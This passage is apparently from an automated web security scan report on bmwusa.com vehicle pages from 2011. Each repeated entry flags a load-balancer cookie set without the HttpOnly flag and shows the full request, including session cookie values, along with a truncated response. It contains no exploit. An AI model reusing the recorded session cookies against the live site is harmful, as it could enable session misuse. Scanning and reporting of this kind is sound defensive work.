Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:11 GMT;path=/
Content-Length: 202520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.210. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:50:32 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:30:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:50:32 GMT;path=/
Content-Length: 214891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.211. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:06 GMT;path=/
Content-Length: 201005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.212. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:05 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:05 GMT;path=/
Content-Length: 216544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.213. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:37 GMT;path=/
Content-Length: 202158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.214. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:48 GMT;path=/
Content-Length: 214704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.215. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:43 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:43 GMT;path=/
Content-Length: 200807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.216. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:36 GMT;path=/
Content-Length: 215578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.217. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:35 GMT;path=/
Content-Length: 202557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.218. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:27 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:27 GMT;path=/
Content-Length: 214980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.219. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:52 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:52 GMT;path=/
Content-Length: 202285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.220. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:05 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:05 GMT;path=/
Content-Length: 215689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.221. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:33 GMT;path=/
Content-Length: 202195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.222. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:43:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
